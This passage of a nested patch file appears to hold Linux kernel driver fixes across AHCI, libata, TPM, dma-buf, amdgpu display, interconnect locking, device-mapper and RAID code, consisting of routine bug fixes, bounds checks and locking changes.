++	ahci_port_clear_pending_irq(ap);
+ 
+ 	/* mark esata ports */
+ 	tmp = readl(port_mmio + PORT_CMD);
+@@ -1601,6 +1610,8 @@ int ahci_do_hardreset(struct ata_link *link, unsigned int *class,
+ 	tf.status = ATA_BUSY;
+ 	ata_tf_to_fis(&tf, 0, 0, d2h_fis);
+ 
++	ahci_port_clear_pending_irq(ap);
++
+ 	rc = sata_link_hardreset(link, timing, deadline, online,
+ 				 ahci_check_ready);
+ 
+diff --git a/drivers/ata/libata-sata.c b/drivers/ata/libata-sata.c
+index fd4dccc253896..71a00842eb5ee 100644
+--- a/drivers/ata/libata-sata.c
++++ b/drivers/ata/libata-sata.c
+@@ -394,10 +394,23 @@ int sata_link_scr_lpm(struct ata_link *link, enum ata_lpm_policy policy,
+ 	case ATA_LPM_MED_POWER_WITH_DIPM:
+ 	case ATA_LPM_MIN_POWER_WITH_PARTIAL:
+ 	case ATA_LPM_MIN_POWER:
+-		if (ata_link_nr_enabled(link) > 0)
+-			/* no restrictions on LPM transitions */
++		if (ata_link_nr_enabled(link) > 0) {
++			/* assume no restrictions on LPM transitions */
+ 			scontrol &= ~(0x7 << 8);
+-		else {
++
++			/*
++			 * If the controller does not support partial, slumber,
++			 * or devsleep, then disallow these transitions.
++			 */
++			if (link->ap->host->flags & ATA_HOST_NO_PART)
++				scontrol |= (0x1 << 8);
++
++			if (link->ap->host->flags & ATA_HOST_NO_SSC)
++				scontrol |= (0x2 << 8);
++
++			if (link->ap->host->flags & ATA_HOST_NO_DEVSLP)
++				scontrol |= (0x4 << 8);
++		} else {
+ 			/* empty port, power off */
+ 			scontrol &= ~0xf;
+ 			scontrol |= (0x1 << 2);
+diff --git a/drivers/bus/ti-sysc.c b/drivers/bus/ti-sysc.c
+index ac36b01cf6d5d..ddde1427c90c7 100644
+--- a/drivers/bus/ti-sysc.c
++++ b/drivers/bus/ti-sysc.c
+@@ -1548,6 +1548,8 @@ static const struct sysc_revision_quirk sysc_revision_quirks[] = {
+ 		   SYSC_QUIRK_SWSUP_SIDLE | SYSC_QUIRK_LEGACY_IDLE),
+ 	SYSC_QUIRK("uart", 0, 0x50, 0x54, 0x58, 0x47422e03, 0xffffffff,
+ 		   SYSC_QUIRK_SWSUP_SIDLE | SYSC_QUIRK_LEGACY_IDLE),
++	SYSC_QUIRK("uart", 0, 0x50, 0x54, 0x58, 0x47424e03, 0xffffffff,
++		   SYSC_QUIRK_SWSUP_SIDLE | SYSC_QUIRK_LEGACY_IDLE),
+ 
+ 	/* Quirks that need to be set based on the module address */
+ 	SYSC_QUIRK("mcpdm", 0x40132000, 0, 0x10, -ENODEV, 0x50000800, 0xffffffff,
+diff --git a/drivers/char/tpm/tpm_tis_core.c b/drivers/char/tpm/tpm_tis_core.c
+index 44f71f2c8cfa0..5889d9edaf940 100644
+--- a/drivers/char/tpm/tpm_tis_core.c
++++ b/drivers/char/tpm/tpm_tis_core.c
+@@ -498,10 +498,17 @@ static int tpm_tis_send_main(struct tpm_chip *chip, const u8 *buf, size_t len)
+ 	int rc;
+ 	u32 ordinal;
+ 	unsigned long dur;
++	unsigned int try;
+ 
+-	rc = tpm_tis_send_data(chip, buf, len);
+-	if (rc < 0)
+-		return rc;
++	for (try = 0; try < TPM_RETRY; try++) {
++		rc = tpm_tis_send_data(chip, buf, len);
++		if (rc >= 0)
++			/* Data transfer done successfully */
++			break;
++		else if (rc != -EIO)
++			/* Data transfer failed, not recoverable */
++			return rc;
++	}
+ 
+ 	rc = tpm_tis_verify_crc(priv, len, buf);
+ 	if (rc < 0) {
+diff --git a/drivers/dma-buf/dma-buf.c b/drivers/dma-buf/dma-buf.c
+index eb6b59363c4f5..3d58514d04826 100644
+--- a/drivers/dma-buf/dma-buf.c
++++ b/drivers/dma-buf/dma-buf.c
+@@ -1105,6 +1105,34 @@ struct sg_table *dma_buf_map_attachment(struct dma_buf_attachment *attach,
+ }
+ EXPORT_SYMBOL_NS_GPL(dma_buf_map_attachment, DMA_BUF);
+ 
++/**
++ * dma_buf_map_attachment_unlocked - Returns the scatterlist table of the attachment;
++ * mapped into _device_ address space. Is a wrapper for map_dma_buf() of the
++ * dma_buf_ops.
++ * @attach:	[in]	attachment whose scatterlist is to be returned
++ * @direction:	[in]	direction of DMA transfer
++ *
++ * Unlocked variant of dma_buf_map_attachment().
++ */
++struct sg_table *
++dma_buf_map_attachment_unlocked(struct dma_buf_attachment *attach,
++				enum dma_data_direction direction)
++{
++	struct sg_table *sg_table;
++
++	might_sleep();
++
++	if (WARN_ON(!attach || !attach->dmabuf))
++		return ERR_PTR(-EINVAL);
++
++	dma_resv_lock(attach->dmabuf->resv, NULL);
++	sg_table = dma_buf_map_attachment(attach, direction);
++	dma_resv_unlock(attach->dmabuf->resv);
++
++	return sg_table;
++}
++EXPORT_SYMBOL_NS_GPL(dma_buf_map_attachment_unlocked, DMA_BUF);
++
+ /**
+  * dma_buf_unmap_attachment - unmaps and decreases usecount of the buffer;might
+  * deallocate the scatterlist associated. Is a wrapper for unmap_dma_buf() of
+@@ -1141,6 +1169,31 @@ void dma_buf_unmap_attachment(struct dma_buf_attachment *attach,
+ }
+ EXPORT_SYMBOL_NS_GPL(dma_buf_unmap_attachment, DMA_BUF);
+ 
++/**
++ * dma_buf_unmap_attachment_unlocked - unmaps and decreases usecount of the buffer;might
++ * deallocate the scatterlist associated. Is a wrapper for unmap_dma_buf() of
++ * dma_buf_ops.
++ * @attach:	[in]	attachment to unmap buffer from
++ * @sg_table:	[in]	scatterlist info of the buffer to unmap
++ * @direction:	[in]	direction of DMA transfer
++ *
++ * Unlocked variant of dma_buf_unmap_attachment().
++ */
++void dma_buf_unmap_attachment_unlocked(struct dma_buf_attachment *attach,
++				       struct sg_table *sg_table,
++				       enum dma_data_direction direction)
++{
++	might_sleep();
++
++	if (WARN_ON(!attach || !attach->dmabuf || !sg_table))
++		return;
++
++	dma_resv_lock(attach->dmabuf->resv, NULL);
++	dma_buf_unmap_attachment(attach, sg_table, direction);
++	dma_resv_unlock(attach->dmabuf->resv);
++}
++EXPORT_SYMBOL_NS_GPL(dma_buf_unmap_attachment_unlocked, DMA_BUF);
++
+ /**
+  * dma_buf_move_notify - notify attachments that DMA-buf is moving
+  *
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+index 0c962f996aff5..c46c6fbd235e8 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+@@ -1266,7 +1266,6 @@ int amdgpu_device_gpu_recover(struct amdgpu_device *adev,
+ void amdgpu_device_pci_config_reset(struct amdgpu_device *adev);
+ int amdgpu_device_pci_reset(struct amdgpu_device *adev);
+ bool amdgpu_device_need_post(struct amdgpu_device *adev);
+-bool amdgpu_sg_display_supported(struct amdgpu_device *adev);
+ bool amdgpu_device_pcie_dynamic_switching_supported(void);
+ bool amdgpu_device_should_use_aspm(struct amdgpu_device *adev);
+ bool amdgpu_device_aspm_support_quirk(void);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+index 02a112d00d413..4624160315648 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+@@ -120,7 +120,6 @@ static int amdgpu_cs_p1_user_fence(struct amdgpu_cs_parser *p,
+ 	struct drm_gem_object *gobj;
+ 	struct amdgpu_bo *bo;
+ 	unsigned long size;
+-	int r;
+ 
+ 	gobj = drm_gem_object_lookup(p->filp, data->handle);
+ 	if (gobj == NULL)
+@@ -132,23 +131,14 @@ static int amdgpu_cs_p1_user_fence(struct amdgpu_cs_parser *p,
+ 	drm_gem_object_put(gobj);
+ 
+ 	size = amdgpu_bo_size(bo);
+-	if (size != PAGE_SIZE || (data->offset + 8) > size) {
+-		r = -EINVAL;
+-		goto error_unref;
+-	}
++	if (size != PAGE_SIZE || data->offset > (size - 8))
++		return -EINVAL;
+ 
+-	if (amdgpu_ttm_tt_get_usermm(bo->tbo.ttm)) {
+-		r = -EINVAL;
+-		goto error_unref;
+-	}
++	if (amdgpu_ttm_tt_get_usermm(bo->tbo.ttm))
++		return -EINVAL;
+ 
+ 	*offset = data->offset;
+-
+ 	return 0;
+-
+-error_unref:
+-	amdgpu_bo_unref(&bo);
+-	return r;
+ }
+ 
+ static int amdgpu_cs_p1_bo_handles(struct amdgpu_cs_parser *p,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 9aac9e755609d..5f5999cea7d2c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -1336,32 +1336,6 @@ bool amdgpu_device_need_post(struct amdgpu_device *adev)
+ 	return true;
+ }
+ 
+-/*
+- * On APUs with >= 64GB white flickering has been observed w/ SG enabled.
+- * Disable S/G on such systems until we have a proper fix.
+- * https://gitlab.freedesktop.org/drm/amd/-/issues/2354
+- * https://gitlab.freedesktop.org/drm/amd/-/issues/2735
+- */
+-bool amdgpu_sg_display_supported(struct amdgpu_device *adev)
+-{
+-	switch (amdgpu_sg_display) {
+-	case -1:
+-		break;
+-	case 0:
+-		return false;
+-	case 1:
+-		return true;
+-	default:
+-		return false;
+-	}
+-	if ((totalram_pages() << (PAGE_SHIFT - 10)) +
+-	    (adev->gmc.real_vram_size / 1024) >= 64000000) {
+-		DRM_WARN("Disabling S/G due to >=64GB RAM\n");
+-		return false;
+-	}
+-	return true;
+-}
+-
+ /*
+  * Intel hosts such as Raptor Lake and Sapphire Rapids don't support dynamic
+  * speed switching. Until we have confirmation from Intel that a specific host
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index c8e562dcd99d0..18274ff5082ad 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1265,11 +1265,15 @@ static void mmhub_read_system_context(struct amdgpu_device *adev, struct dc_phy_
+ 
+ 	pt_base = amdgpu_gmc_pd_addr(adev->gart.bo);
+ 
+-	page_table_start.high_part = (u32)(adev->gmc.gart_start >> 44) & 0xF;
+-	page_table_start.low_part = (u32)(adev->gmc.gart_start >> 12);
+-	page_table_end.high_part = (u32)(adev->gmc.gart_end >> 44) & 0xF;
+-	page_table_end.low_part = (u32)(adev->gmc.gart_end >> 12);
+-	page_table_base.high_part = upper_32_bits(pt_base) & 0xF;
++	page_table_start.high_part = upper_32_bits(adev->gmc.gart_start >>
++						   AMDGPU_GPU_PAGE_SHIFT);
++	page_table_start.low_part = lower_32_bits(adev->gmc.gart_start >>
++						  AMDGPU_GPU_PAGE_SHIFT);
++	page_table_end.high_part = upper_32_bits(adev->gmc.gart_end >>
++						 AMDGPU_GPU_PAGE_SHIFT);
++	page_table_end.low_part = lower_32_bits(adev->gmc.gart_end >>
++						AMDGPU_GPU_PAGE_SHIFT);
++	page_table_base.high_part = upper_32_bits(pt_base);
+ 	page_table_base.low_part = lower_32_bits(pt_base);
+ 
+ 	pa_config->system_aperture.start_addr = (uint64_t)logical_addr_low << 18;
+@@ -1634,8 +1638,9 @@ static int amdgpu_dm_init(struct amdgpu_device *adev)
+ 		}
+ 		break;
+ 	}
+-	if (init_data.flags.gpu_vm_support)
+-		init_data.flags.gpu_vm_support = amdgpu_sg_display_supported(adev);
++	if (init_data.flags.gpu_vm_support &&
++	    (amdgpu_sg_display == 0))
++		init_data.flags.gpu_vm_support = false;
+ 
+ 	if (init_data.flags.gpu_vm_support)
+ 		adev->mode_info.gpu_vm_support = true;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+index ffbb739d85b69..8496ff4a25e35 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+@@ -290,7 +290,8 @@ static void dccg32_set_dpstreamclk(
+ 	struct dcn_dccg *dccg_dcn = TO_DCN_DCCG(dccg);
+ 
+ 	/* set the dtbclk_p source */
+-	dccg32_set_dtbclk_p_src(dccg, src, otg_inst);
++	/* always program refclk as DTBCLK. No use-case expected to require DPREFCLK as refclk */
++	dccg32_set_dtbclk_p_src(dccg, DTBCLK0, otg_inst);
+ 
+ 	/* enabled to select one of the DTBCLKs for pipe */
+ 	switch (dp_hpo_inst) {
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c b/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c
+index ebc04b72b284b..9c84561ff3bc4 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c
+@@ -4133,7 +4133,9 @@ void dml31_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 				}
+ 				if (v->OutputFormat[k] == dm_420 && v->HActive[k] > DCN31_MAX_FMT_420_BUFFER_WIDTH
+ 						&& v->ODMCombineEnablePerState[i][k] != dm_odm_combine_mode_4to1) {
+-					if (v->HActive[k] / 2 > DCN31_MAX_FMT_420_BUFFER_WIDTH) {
++					if (v->Output[k] == dm_hdmi) {
++						FMTBufferExceeded = true;
++					} else if (v->HActive[k] / 2 > DCN31_MAX_FMT_420_BUFFER_WIDTH) {
+ 						v->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_4to1;
+ 						v->PlaneRequiredDISPCLK = v->PlaneRequiredDISPCLKWithODMCombine4To1;
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c b/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c
+index 4998b211ccac7..5b47ccde64241 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c
+@@ -4225,7 +4225,9 @@ void dml314_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_
+ 				}
+ 				if (v->OutputFormat[k] == dm_420 && v->HActive[k] > DCN314_MAX_FMT_420_BUFFER_WIDTH
+ 						&& v->ODMCombineEnablePerState[i][k] != dm_odm_combine_mode_4to1) {
+-					if (v->HActive[k] / 2 > DCN314_MAX_FMT_420_BUFFER_WIDTH) {
++					if (v->Output[k] == dm_hdmi) {
++						FMTBufferExceeded = true;
++					} else if (v->HActive[k] / 2 > DCN314_MAX_FMT_420_BUFFER_WIDTH) {
+ 						v->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_4to1;
+ 						v->PlaneRequiredDISPCLK = v->PlaneRequiredDISPCLKWithODMCombine4To1;
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c
+index b53feeaf5cf11..23e4be2ad63f9 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c
+@@ -3454,6 +3454,7 @@ bool dml32_CalculatePrefetchSchedule(
+ 	double TimeForFetchingMetaPTE = 0;
+ 	double TimeForFetchingRowInVBlank = 0;
+ 	double LinesToRequestPrefetchPixelData = 0;
++	double LinesForPrefetchBandwidth = 0;
+ 	unsigned int HostVMDynamicLevelsTrips;
+ 	double  trip_to_mem;
+ 	double  Tvm_trips;
+@@ -3883,11 +3884,15 @@ bool dml32_CalculatePrefetchSchedule(
+ 			TimeForFetchingMetaPTE = Tvm_oto;
+ 			TimeForFetchingRowInVBlank = Tr0_oto;
+ 			*PrefetchBandwidth = prefetch_bw_oto;
++			/* Clamp to oto for bandwidth calculation */
++			LinesForPrefetchBandwidth = dst_y_prefetch_oto;
+ 		} else {
+ 			*DestinationLinesForPrefetch = dst_y_prefetch_equ;
+ 			TimeForFetchingMetaPTE = Tvm_equ;
+ 			TimeForFetchingRowInVBlank = Tr0_equ;
+ 			*PrefetchBandwidth = prefetch_bw_equ;
++			/* Clamp to equ for bandwidth calculation */
++			LinesForPrefetchBandwidth = dst_y_prefetch_equ;
+ 		}
+ 
+ 		*DestinationLinesToRequestVMInVBlank = dml_ceil(4.0 * TimeForFetchingMetaPTE / LineTime, 1.0) / 4.0;
+@@ -3895,7 +3900,7 @@ bool dml32_CalculatePrefetchSchedule(
+ 		*DestinationLinesToRequestRowInVBlank =
+ 				dml_ceil(4.0 * TimeForFetchingRowInVBlank / LineTime, 1.0) / 4.0;
+ 
+-		LinesToRequestPrefetchPixelData = *DestinationLinesForPrefetch -
++		LinesToRequestPrefetchPixelData = LinesForPrefetchBandwidth -
+ 				*DestinationLinesToRequestVMInVBlank - 2 * *DestinationLinesToRequestRowInVBlank;
+ 
+ #ifdef __DML_VBA_DEBUG__
+diff --git a/drivers/gpu/drm/bridge/tc358762.c b/drivers/gpu/drm/bridge/tc358762.c
+index 7f4fce1aa9988..8db981e7759b9 100644
+--- a/drivers/gpu/drm/bridge/tc358762.c
++++ b/drivers/gpu/drm/bridge/tc358762.c
+@@ -216,7 +216,7 @@ static int tc358762_probe(struct mipi_dsi_device *dsi)
+ 	dsi->lanes = 1;
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+ 	dsi->mode_flags = MIPI_DSI_MODE_VIDEO | MIPI_DSI_MODE_VIDEO_SYNC_PULSE |
+-			  MIPI_DSI_MODE_LPM;
++			  MIPI_DSI_MODE_LPM | MIPI_DSI_MODE_VIDEO_HSE;
+ 
+ 	ret = tc358762_parse_dt(ctx);
+ 	if (ret < 0)
+diff --git a/drivers/gpu/drm/drm_edid.c b/drivers/gpu/drm/drm_edid.c
+index 739e0d40cca61..5ed77e3361fd7 100644
+--- a/drivers/gpu/drm/drm_edid.c
++++ b/drivers/gpu/drm/drm_edid.c
+@@ -231,6 +231,7 @@ static const struct edid_quirk {
+ 
+ 	/* OSVR HDK and HDK2 VR Headsets */
+ 	EDID_QUIRK('S', 'V', 'R', 0x1019, EDID_QUIRK_NON_DESKTOP),
++	EDID_QUIRK('A', 'U', 'O', 0x1111, EDID_QUIRK_NON_DESKTOP),
+ };
+ 
+ /*
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_crtc.c b/drivers/gpu/drm/exynos/exynos_drm_crtc.c
+index 4153f302de7c4..d19e796c20613 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_crtc.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_crtc.c
+@@ -39,13 +39,12 @@ static void exynos_drm_crtc_atomic_disable(struct drm_crtc *crtc,
+ 	if (exynos_crtc->ops->atomic_disable)
+ 		exynos_crtc->ops->atomic_disable(exynos_crtc);
+ 
++	spin_lock_irq(&crtc->dev->event_lock);
+ 	if (crtc->state->event && !crtc->state->active) {
+-		spin_lock_irq(&crtc->dev->event_lock);
+ 		drm_crtc_send_vblank_event(crtc, crtc->state->event);
+-		spin_unlock_irq(&crtc->dev->event_lock);
+-
+ 		crtc->state->event = NULL;
+ 	}
++	spin_unlock_irq(&crtc->dev->event_lock);
+ }
+ 
+ static int exynos_crtc_atomic_check(struct drm_crtc *crtc,
+diff --git a/drivers/gpu/drm/mediatek/mtk_dp.c b/drivers/gpu/drm/mediatek/mtk_dp.c
+index 4c249939a6c3b..395a190274cfb 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dp.c
++++ b/drivers/gpu/drm/mediatek/mtk_dp.c
+@@ -847,7 +847,7 @@ static int mtk_dp_aux_do_transfer(struct mtk_dp *mtk_dp, bool is_read, u8 cmd,
+ 		u32 phy_status = mtk_dp_read(mtk_dp, MTK_DP_AUX_P0_3628) &
+ 				 AUX_RX_PHY_STATE_AUX_TX_P0_MASK;
+ 		if (phy_status != AUX_RX_PHY_STATE_AUX_TX_P0_RX_IDLE) {
+-			drm_err(mtk_dp->drm_dev,
++			dev_err(mtk_dp->dev,
+ 				"AUX Rx Aux hang, need SW reset\n");
+ 			return -EIO;
+ 		}
+@@ -2062,7 +2062,7 @@ static ssize_t mtk_dp_aux_transfer(struct drm_dp_aux *mtk_aux,
+ 		is_read = true;
+ 		break;
+ 	default:
+-		drm_err(mtk_aux->drm_dev, "invalid aux cmd = %d\n",
++		dev_err(mtk_dp->dev, "invalid aux cmd = %d\n",
+ 			msg->request);
+ 		ret = -EINVAL;
+ 		goto err;
+@@ -2078,7 +2078,7 @@ static ssize_t mtk_dp_aux_transfer(struct drm_dp_aux *mtk_aux,
+ 					     to_access, &msg->reply);
+ 
+ 		if (ret) {
+-			drm_info(mtk_dp->drm_dev,
++			dev_info(mtk_dp->dev,
+ 				 "Failed to do AUX transfer: %d\n", ret);
+ 			goto err;
+ 		}
+diff --git a/drivers/gpu/drm/tiny/gm12u320.c b/drivers/gpu/drm/tiny/gm12u320.c
+index 7441d992a5d7a..8b0a9059d3fdd 100644
+--- a/drivers/gpu/drm/tiny/gm12u320.c
++++ b/drivers/gpu/drm/tiny/gm12u320.c
+@@ -69,10 +69,10 @@ MODULE_PARM_DESC(eco_mode, "Turn on Eco mode (less bright, more silent)");
+ #define READ_STATUS_SIZE		13
+ #define MISC_VALUE_SIZE			4
+ 
+-#define CMD_TIMEOUT			msecs_to_jiffies(200)
+-#define DATA_TIMEOUT			msecs_to_jiffies(1000)
+-#define IDLE_TIMEOUT			msecs_to_jiffies(2000)
+-#define FIRST_FRAME_TIMEOUT		msecs_to_jiffies(2000)
++#define CMD_TIMEOUT			200
++#define DATA_TIMEOUT			1000
++#define IDLE_TIMEOUT			2000
++#define FIRST_FRAME_TIMEOUT		2000
+ 
+ #define MISC_REQ_GET_SET_ECO_A		0xff
+ #define MISC_REQ_GET_SET_ECO_B		0x35
+@@ -388,7 +388,7 @@ static void gm12u320_fb_update_work(struct work_struct *work)
+ 	 * switches back to showing its logo.
+ 	 */
+ 	queue_delayed_work(system_long_wq, &gm12u320->fb_update.work,
+-			   IDLE_TIMEOUT);
++			   msecs_to_jiffies(IDLE_TIMEOUT));
+ 
+ 	return;
+ err:
+diff --git a/drivers/i2c/busses/i2c-aspeed.c b/drivers/i2c/busses/i2c-aspeed.c
+index c64c381b69b7f..866c52afb8b0a 100644
+--- a/drivers/i2c/busses/i2c-aspeed.c
++++ b/drivers/i2c/busses/i2c-aspeed.c
+@@ -698,13 +698,16 @@ static int aspeed_i2c_master_xfer(struct i2c_adapter *adap,
+ 
+ 	if (time_left == 0) {
+ 		/*
+-		 * If timed out and bus is still busy in a multi master
+-		 * environment, attempt recovery at here.
++		 * In a multi-master setup, if a timeout occurs, attempt
++		 * recovery. But if the bus is idle, we still need to reset the
++		 * i2c controller to clear the remaining interrupts.
+ 		 */
+ 		if (bus->multi_master &&
+ 		    (readl(bus->base + ASPEED_I2C_CMD_REG) &
+ 		     ASPEED_I2CD_BUS_BUSY_STS))
+ 			aspeed_i2c_recover_bus(bus);
++		else
++			aspeed_i2c_reset(bus);
+ 
+ 		/*
+ 		 * If timed out and the state is still pending, drop the pending
+diff --git a/drivers/interconnect/core.c b/drivers/interconnect/core.c
+index cfa52c6369d05..e4b2d9ef61b4d 100644
+--- a/drivers/interconnect/core.c
++++ b/drivers/interconnect/core.c
+@@ -29,6 +29,7 @@ static LIST_HEAD(icc_providers);
+ static int providers_count;
+ static bool synced_state;
+ static DEFINE_MUTEX(icc_lock);
++static DEFINE_MUTEX(icc_bw_lock);
+ static struct dentry *icc_debugfs_dir;
+ 
+ static void icc_summary_show_one(struct seq_file *s, struct icc_node *n)
+@@ -632,7 +633,7 @@ int icc_set_bw(struct icc_path *path, u32 avg_bw, u32 peak_bw)
+ 	if (WARN_ON(IS_ERR(path) || !path->num_nodes))
+ 		return -EINVAL;
+ 
+-	mutex_lock(&icc_lock);
++	mutex_lock(&icc_bw_lock);
+ 
+ 	old_avg = path->reqs[0].avg_bw;
+ 	old_peak = path->reqs[0].peak_bw;
+@@ -664,7 +665,7 @@ int icc_set_bw(struct icc_path *path, u32 avg_bw, u32 peak_bw)
+ 		apply_constraints(path);
+ 	}
+ 
+-	mutex_unlock(&icc_lock);
++	mutex_unlock(&icc_bw_lock);
+ 
+ 	trace_icc_set_bw_end(path, ret);
+ 
+@@ -967,6 +968,7 @@ void icc_node_add(struct icc_node *node, struct icc_provider *provider)
+ 		return;
+ 
+ 	mutex_lock(&icc_lock);
++	mutex_lock(&icc_bw_lock);
+ 
+ 	node->provider = provider;
+ 	list_add_tail(&node->node_list, &provider->nodes);
+@@ -992,6 +994,7 @@ void icc_node_add(struct icc_node *node, struct icc_provider *provider)
+ 	node->avg_bw = 0;
+ 	node->peak_bw = 0;
+ 
++	mutex_unlock(&icc_bw_lock);
+ 	mutex_unlock(&icc_lock);
+ }
+ EXPORT_SYMBOL_GPL(icc_node_add);
+@@ -1129,6 +1132,7 @@ void icc_sync_state(struct device *dev)
+ 		return;
+ 
+ 	mutex_lock(&icc_lock);
++	mutex_lock(&icc_bw_lock);
+ 	synced_state = true;
+ 	list_for_each_entry(p, &icc_providers, provider_list) {
+ 		dev_dbg(p->dev, "interconnect provider is in synced state\n");
+@@ -1141,13 +1145,21 @@ void icc_sync_state(struct device *dev)
+ 			}
+ 		}
+ 	}
++	mutex_unlock(&icc_bw_lock);
+ 	mutex_unlock(&icc_lock);
+ }
+ EXPORT_SYMBOL_GPL(icc_sync_state);
+ 
+ static int __init icc_init(void)
+ {
+-	struct device_node *root = of_find_node_by_path("/");
++	struct device_node *root;
++
++	/* Teach lockdep about lock ordering wrt. shrinker: */
++	fs_reclaim_acquire(GFP_KERNEL);
++	might_lock(&icc_bw_lock);
++	fs_reclaim_release(GFP_KERNEL);
++
++	root = of_find_node_by_path("/");
+ 
+ 	providers_count = of_count_icc_providers(root);
+ 	of_node_put(root);
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index acf7e7551c941..0ec85d159bcde 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -707,24 +707,6 @@ static void dm_put_live_table_fast(struct mapped_device *md) __releases(RCU)
+ 	rcu_read_unlock();
+ }
+ 
+-static inline struct dm_table *dm_get_live_table_bio(struct mapped_device *md,
+-					int *srcu_idx, blk_opf_t bio_opf)
+-{
+-	if (bio_opf & REQ_NOWAIT)
+-		return dm_get_live_table_fast(md);
+-	else
+-		return dm_get_live_table(md, srcu_idx);
+-}
+-
+-static inline void dm_put_live_table_bio(struct mapped_device *md, int srcu_idx,
+-					 blk_opf_t bio_opf)
+-{
+-	if (bio_opf & REQ_NOWAIT)
+-		dm_put_live_table_fast(md);
+-	else
+-		dm_put_live_table(md, srcu_idx);
+-}
+-
+ static char *_dm_claim_ptr = "I belong to device-mapper";
+ 
+ /*
+@@ -1805,9 +1787,8 @@ static void dm_submit_bio(struct bio *bio)
+ 	struct mapped_device *md = bio->bi_bdev->bd_disk->private_data;
+ 	int srcu_idx;
+ 	struct dm_table *map;
+-	blk_opf_t bio_opf = bio->bi_opf;
+ 
+-	map = dm_get_live_table_bio(md, &srcu_idx, bio_opf);
++	map = dm_get_live_table(md, &srcu_idx);
+ 
+ 	/* If suspended, or map not yet available, queue this IO for later */
+ 	if (unlikely(test_bit(DMF_BLOCK_IO_FOR_SUSPEND, &md->flags)) ||
+@@ -1823,7 +1804,7 @@ static void dm_submit_bio(struct bio *bio)
+ 
+ 	dm_split_and_process_bio(md, map, bio);
+ out:
+-	dm_put_live_table_bio(md, srcu_idx, bio_opf);
++	dm_put_live_table(md, srcu_idx);
+ }
+ 
+ static bool dm_poll_dm_io(struct dm_io *io, struct io_comp_batch *iob,
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 86b2acfba1a7f..e87507d29895e 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -8228,7 +8228,7 @@ static void *md_seq_next(struct seq_file *seq, void *v, loff_t *pos)
+ 	spin_unlock(&all_mddevs_lock);
+ 
+ 	if (to_put)
+-		mddev_put(mddev);
++		mddev_put(to_put);
+ 	return next_mddev;
+ 
+ }
+diff --git a/drivers/md/raid1.c b/drivers/md/raid1.c
+index ac64c587191b9..30f906a67def4 100644
+--- a/drivers/md/raid1.c
++++ b/drivers/md/raid1.c
+@@ -1828,6 +1828,9 @@ static int raid1_remove_disk(struct mddev *mddev, struct md_rdev *rdev)
+ 	int number = rdev->raid_disk;
+ 	struct raid1_info *p = conf->mirrors + number;
+ 
++	if (unlikely(number >= conf->raid_disks))
++		goto abort;
++
+ 	if (rdev != p->rdev)
+ 		p = conf->mirrors + conf->raid_disks + number;
+ 
+diff --git a/drivers/media/pci/cx23885/cx23885-video.c b/drivers/media/pci/cx23885/cx23885-video.c
+index 671fc0588e431..9af2c5596121c 100644
+--- a/drivers/media/pci/cx23885/cx23885-video.c
++++ b/drivers/media/pci/cx23885/cx23885-video.c
+@@ -413,7 +413,7 @@ static int buffer_prepare(struct vb2_buffer *vb)
+ 				dev->height >> 1);
+ 		break;
+ 	default:
+-		BUG();
++		return -EINVAL; /* should not happen */
+ 	}
+ 	dprintk(2, "[%p/%d] buffer_init - %dx%d %dbpp 0x%08x - dma=0x%08lx\n",
+ 		buf, buf->vb.vb2_buf.index,
